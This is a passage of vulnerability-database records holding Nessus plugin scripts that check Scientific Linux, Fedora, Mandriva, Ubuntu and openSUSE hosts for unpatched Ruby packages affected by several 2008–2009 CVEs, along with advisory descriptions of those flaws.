(CVE-2008-3657)\n\nA denial of service flaw was discovered in WEBrick, Ruby's HTTP server\ntoolkit. A remote attacker could send a specially crafted HTTP request\nto a WEBrick server that would cause the server to use an excessive\namount of CPU time. (CVE-2008-3656)\n\nA number of flaws were found in the safe-level restrictions in Ruby.\nIt was possible for an attacker to create a carefully crafted\nmalicious script that can allow the bypass of certain safe-level\nrestrictions. (CVE-2008-3655)\n\nA denial of service flaw was found in Ruby's regular expression\nengine. If a Ruby script tried to process a large amount of data via a\nregular expression, it could cause Ruby to enter an infinite-loop and\ncrash. (CVE-2008-3443)\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind0810&L=scientific-linux-errata&T=0&P=2062\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?c0d1a4fd\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_cwe_id(20, 264, 287, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/10/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/08/01\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL3\", reference:\"irb-1.6.8-13.el3\")) flag++;\nif (rpm_check(release:\"SL3\", reference:\"ruby-1.6.8-13.el3\")) flag++;\nif (rpm_check(release:\"SL3\", reference:\"ruby-devel-1.6.8-13.el3\")) flag++;\nif (rpm_check(release:\"SL3\", reference:\"ruby-docs-1.6.8-13.el3\")) flag++;\nif (rpm_check(release:\"SL3\", reference:\"ruby-libs-1.6.8-13.el3\")) flag++;\nif (rpm_check(release:\"SL3\", reference:\"ruby-mode-1.6.8-13.el3\")) flag++;\nif (rpm_check(release:\"SL3\", reference:\"ruby-tcltk-1.6.8-13.el3\")) flag++;\n\nif (rpm_check(release:\"SL4\", reference:\"irb-1.8.1-7.el4_7.1\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"ruby-1.8.1-7.el4_7.1\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"ruby-devel-1.8.1-7.el4_7.1\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"ruby-docs-1.8.1-7.el4_7.1\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"ruby-libs-1.8.1-7.el4_7.1\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"ruby-mode-1.8.1-7.el4_7.1\")) flag++;\nif (rpm_check(release:\"SL4\", 
reference:\"ruby-tcltk-1.8.1-7.el4_7.1\")) flag++;\n\nif (rpm_check(release:\"SL5\", reference:\"ruby-1.8.5-5.el5_2.5\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"ruby-devel-1.8.5-5.el5_2.5\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"ruby-docs-1.8.5-5.el5_2.5\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"ruby-irb-1.8.5-5.el5_2.5\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"ruby-libs-1.8.5-5.el5_2.5\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"ruby-mode-1.8.5-5.el5_2.5\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"ruby-rdoc-1.8.5-5.el5_2.5\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"ruby-ri-1.8.5-5.el5_2.5\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"ruby-tcltk-1.8.5-5.el5_2.5\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-11-01T02:26:39", "bulletinFamily": "scanner", "description": "Update to new upstream release fixing multiple security issues\ndetailed in the upstream advisories:\nhttp://www.ruby-lang.org/en/news/2008/08/08/multiple-\nvulnerabilities-in-ruby/ - CVE-2008-3655 - multiple insufficient safe\nmode restrictions - CVE-2008-3656 - WEBrick DoS vulnerability (CPU\nconsumption) - CVE-2008-3657 - missing ", "modified": "2019-11-02T00:00:00", "id": "FEDORA_2008-8736.NASL", "href": "https://www.tenable.com/plugins/nessus/34379", "published": "2008-10-10T00:00:00", "title": "Fedora 8 : ruby-1.8.6.287-2.fc8 (2008-8736)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2008-8736.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(34379);\n script_version (\"1.19\");\n 
script_cvs_date(\"Date: 2019/08/02 13:32:28\");\n\n script_cve_id(\"CVE-2008-3443\", \"CVE-2008-3655\", \"CVE-2008-3656\", \"CVE-2008-3657\", \"CVE-2008-3790\", \"CVE-2008-3905\");\n script_bugtraq_id(30644, 30682, 30802);\n script_xref(name:\"FEDORA\", value:\"2008-8736\");\n\n script_name(english:\"Fedora 8 : ruby-1.8.6.287-2.fc8 (2008-8736)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Update to new upstream release fixing multiple security issues\ndetailed in the upstream advisories:\nhttp://www.ruby-lang.org/en/news/2008/08/08/multiple-\nvulnerabilities-in-ruby/ - CVE-2008-3655 - multiple insufficient safe\nmode restrictions - CVE-2008-3656 - WEBrick DoS vulnerability (CPU\nconsumption) - CVE-2008-3657 - missing 'taintness' checks in dl module\n- CVE-2008-3905 - resolv.rb adds random transactions ids and source\nports to prevent DNS spoofing attacks\nhttp://www.ruby-lang.org/en/news/2008/08/23/dos-vulnerability-in-\nrexml/ - CVE-2008-3790 - DoS in the REXML module One issue not covered\nby any upstream advisory: - CVE-2008-3443 - DoS in the regular\nexpression engine\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.ruby-lang.org/en/news/2008/08/08/multiple-\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.ruby-lang.org/en/news/2008/08/23/dos-vulnerability-in-\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=458948\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=458953\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=458966\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=459266\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=460134\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=461495\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2008-October/015239.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?dfefb88c\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected ruby package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(20, 264, 287, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:ruby\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:8\");\n\n 
script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/10/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/10/10\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2008-2019 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! 
ereg(pattern:\"^8([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 8.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC8\", reference:\"ruby-1.8.6.287-2.fc8\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ruby\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-11-01T02:55:03", "bulletinFamily": "scanner", "description": "A denial of service condition was found in Ruby", "modified": "2019-11-02T00:00:00", "id": "MANDRIVA_MDVSA-2008-226.NASL", "href": "https://www.tenable.com/plugins/nessus/38018", "published": "2009-04-23T00:00:00", "title": "Mandriva Linux Security Advisory : ruby (MDVSA-2008:226)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2008:226. 
\n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(38018);\n script_version (\"1.16\");\n script_cvs_date(\"Date: 2019/08/02 13:32:50\");\n\n script_cve_id(\"CVE-2008-3443\", \"CVE-2008-3655\", \"CVE-2008-3656\", \"CVE-2008-3657\", \"CVE-2008-3790\", \"CVE-2008-3905\");\n script_xref(name:\"MDVSA\", value:\"2008:226\");\n\n script_name(english:\"Mandriva Linux Security Advisory : ruby (MDVSA-2008:226)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A denial of service condition was found in Ruby's regular expression\nengine. If a Ruby script tried to process a large amount of data via a\nregular expression, it could cause Ruby to enter an infinite loop and\ncrash (CVE-2008-3443).\n\nA number of flaws were found in Ruby that could allow an attacker to\ncreate a carefully crafted script that could allow for the bypass of\ncertain safe-level restrictions (CVE-2008-3655).\n\nA denial of service vulnerability was found in Ruby's HTTP server\ntoolkit, WEBrick. A remote attacker could send a specially crafted\nHTTP request to a WEBrick server that would cause it to use an\nexcessive amount of CPU time (CVE-2008-3656).\n\nAn insufficient taintness check issue was found in Ruby's DL module, a\nmodule that provides direct access to the C language functions. 
This\nflaw could be used by an attacker to bypass intended safe-level\nrestrictions by calling external C functions with the arguments from\nan untrusted tainted input (CVE-2008-3657).\n\nA denial of service condition in Ruby's XML document parsing module\n(REXML) could cause a Ruby application using the REXML module to use\nan excessive amount of CPU and memory via XML documents with large XML\nentitity definitions recursion (CVE-2008-3790).\n\nThe Ruby DNS resolver library used predictable transaction IDs and a\nfixed source port when sending DNS requests. This could be used by a\nremote attacker to spoof a malicious reply to a DNS query\n(CVE-2008-3905).\n\nThe updated packages have been patched to correct these issues.\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_cwe_id(20, 264, 287, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:ruby\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:ruby-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:ruby-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:ruby-tk\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2008.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2008.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/11/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/04/23\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2019 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n 
script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK2008.0\", reference:\"ruby-1.8.6-5.3mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"ruby-devel-1.8.6-5.3mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"ruby-doc-1.8.6-5.3mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"ruby-tk-1.8.6-5.3mdv2008.0\", yank:\"mdv\")) flag++;\n\nif (rpm_check(release:\"MDK2008.1\", reference:\"ruby-1.8.6-9p114.2mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"ruby-devel-1.8.6-9p114.2mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"ruby-doc-1.8.6-9p114.2mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"ruby-tk-1.8.6-9p114.2mdv2008.1\", yank:\"mdv\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-11-03T12:38:17", "bulletinFamily": "scanner", "description": "Laurent Gaffie discovered that Ruby did not properly check for memory\nallocation failures. 
If a user or automated system were tricked into\nrunning a malicious script, an attacker could cause a denial of\nservice. (CVE-2008-3443)\n\nThis update also fixes a regression in the upstream patch previously\napplied to fix CVE-2008-3790. The regression would cause parsing of\nsome XML documents to fail.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2019-11-02T00:00:00", "id": "UBUNTU_USN-691-1.NASL", "href": "https://www.tenable.com/plugins/nessus/37474", "published": "2009-04-23T00:00:00", "title": "Ubuntu 8.10 : ruby1.9 vulnerability (USN-691-1)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-691-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(37474);\n script_version(\"1.15\");\n script_cvs_date(\"Date: 2019/08/02 13:33:02\");\n\n script_cve_id(\"CVE-2008-3443\", \"CVE-2008-3790\");\n script_bugtraq_id(30682, 30802);\n script_xref(name:\"USN\", value:\"691-1\");\n\n script_name(english:\"Ubuntu 8.10 : ruby1.9 vulnerability (USN-691-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Laurent Gaffie discovered that Ruby did not properly check for memory\nallocation failures. 
If a user or automated system were tricked into\nrunning a malicious script, an attacker could cause a denial of\nservice. (CVE-2008-3443)\n\nThis update also fixes a regression in the upstream patch previously\napplied to fix CVE-2008-3790. The regression would cause parsing of\nsome XML documents to fail.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/691-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(20, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:irb1.9\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libdbm-ruby1.9\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libgdbm-ruby1.9\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libopenssl-ruby1.9\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libreadline-ruby1.9\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libruby1.9\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libruby1.9-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libtcltk-ruby1.9\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:canonical:ubuntu_linux:rdoc1.9\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:ri1.9\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:ruby1.9\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:ruby1.9-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:ruby1.9-elisp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:ruby1.9-examples\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:8.10\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/12/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/04/23\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2008-2019 Canonical, Inc. / NASL script (C) 2009-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! ereg(pattern:\"^(8\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 8.10\", \"Ubuntu \" + release);\nif ( ! 
get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"8.10\", pkgname:\"irb1.9\", pkgver:\"1.9.0.2-7ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"libdbm-ruby1.9\", pkgver:\"1.9.0.2-7ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"libgdbm-ruby1.9\", pkgver:\"1.9.0.2-7ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"libopenssl-ruby1.9\", pkgver:\"1.9.0.2-7ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"libreadline-ruby1.9\", pkgver:\"1.9.0.2-7ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"libruby1.9\", pkgver:\"1.9.0.2-7ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"libruby1.9-dbg\", pkgver:\"1.9.0.2-7ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"libtcltk-ruby1.9\", pkgver:\"1.9.0.2-7ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"rdoc1.9\", pkgver:\"1.9.0.2-7ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"ri1.9\", pkgver:\"1.9.0.2-7ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"ruby1.9\", pkgver:\"1.9.0.2-7ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"ruby1.9-dev\", pkgver:\"1.9.0.2-7ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"ruby1.9-elisp\", pkgver:\"1.9.0.2-7ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"ruby1.9-examples\", pkgver:\"1.9.0.2-7ubuntu1.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"irb1.9 / libdbm-ruby1.9 / libgdbm-ruby1.9 
/ libopenssl-ruby1.9 / etc\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-11-03T12:17:24", "bulletinFamily": "scanner", "description": "This ruby update improves return value checks for openssl function\nOCSP_basic_verify() (CVE-2009-0642) which allowed an attacker to use\nrevoked certificates. The entropy of DNS identifiers was increased\n(CVE-2008-3905) to avoid spoofing attacks. The code for parsing XML\ndata was vulnerable to a denial of service bug (CVE-2008-3790). An\nattack on algorithm complexity was possible in function\nWEBrick::HTTP::DefaultFileHandler() while parsing HTTP requests\n(CVE-2008-3656) as well as by using the regex engine (CVE-2008-3443)\ncausing high CPU load. Ruby", "modified": "2019-11-02T00:00:00", "id": "SUSE_11_0_RUBY-090703.NASL", "href": "https://www.tenable.com/plugins/nessus/40122", "published": "2009-07-21T00:00:00", "title": "openSUSE Security Update : ruby (ruby-1070)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update ruby-1070.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(40122);\n script_version(\"1.13\");\n script_cvs_date(\"Date: 2019/10/25 13:36:34\");\n\n script_cve_id(\"CVE-2008-3443\", \"CVE-2008-3655\", \"CVE-2008-3656\", \"CVE-2008-3657\", \"CVE-2008-3790\", \"CVE-2008-3905\", \"CVE-2009-0642\", \"CVE-2009-1904\");\n\n script_name(english:\"openSUSE Security Update : ruby (ruby-1070)\");\n script_summary(english:\"Check for the ruby-1070 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This ruby update improves return value checks for openssl function\nOCSP_basic_verify() (CVE-2009-0642) 
which allowed an attacker to use\nrevoked certificates. The entropy of DNS identifiers was increased\n(CVE-2008-3905) to avaid spoofing attacks. The code for parsing XML\ndata was vulnerable to a denial of service bug (CVE-2008-3790). An\nattack on algorithm complexity was possible in function\nWEBrick::HTTP::DefaultFileHandler() while parsing HTTP requests\n(CVE-2008-3656) as well as by using the regex engine (CVE-2008-3443)\ncausing high CPU load. Ruby's access restriction code (CVE-2008-3655)\nas well as safe-level handling using function DL.dlopen()\n(CVE-2008-3657) and big decimal handling (CVE-2009-1904) was improved.\nBypassing HTTP basic authentication (authenticate_with_http_digest) is\nnot possible anymore.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=415678\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=420084\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=423234\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=478019\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=499253\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=509914\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=511568\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected ruby packages.\");\n 